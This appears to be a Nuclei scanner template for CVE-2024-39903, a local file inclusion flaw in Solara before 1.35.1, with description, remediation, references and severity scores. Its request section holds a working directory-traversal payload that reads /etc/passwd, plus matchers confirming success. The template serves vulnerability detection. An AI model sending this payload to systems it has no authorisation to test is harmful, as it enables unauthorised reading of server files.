id: CVE-2024-39903 info: name: Solara <1.35.1 - Local File Inclusion author: iamnoooob,rootxharsh,pdresearch severity: high description: | A Local File Inclusion (LFI) vulnerability was identified in widgetti/solara, in version <1.35.1, which was fixed in version 1.35.1. This vulnerability arises from the application's failure to properly validate URI fragments for directory traversal sequences such as '../' when serving static files. An attacker can exploit this flaw by manipulating the fragment part of the URI to read arbitrary files on the local file system. impact: | Unauthenticated attackers can exploit LFI to read arbitrary files from the local filesystem. remediation: | Update Solara to version 1.35.1 or later. reference: - https://nvd.nist.gov/vuln/detail/CVE-2024-39903 - https://github.com/widgetti/solara/commit/df2fd66a7f4e8ffd36e8678697a8a4f76760dc54 - https://github.com/widgetti/solara/security/advisories/GHSA-9794-pc4r-438w classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L cvss-score: 8.6 cve-id: CVE-2024-39903 cwe-id: CWE-22 epss-score: 0.02884 epss-percentile: 0.8547 metadata: fofa-query: icon_hash="-223126228" verified: true max-request: 1 tags: cve,cve2024,solara,lfi,vuln http: - raw: - |+ GET /static/nbextensions/#/../../../../../../../../../../etc/passwd HTTP/1.1 Host: {{Hostname}} unsafe: true matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:" - type: regex part: content_type regex: - "text/plain" - type: status status: - 200 # digest: 4b0a00483046022100b40235b892d3d14116c83394e98edffada50f453f5bb7a637ce62c29b236b0a00221009f33b94d064652895038a7e66a8a142f300d910265e1158ee4c53aec3954be50:922c64590222798bb761d5b6d8e72950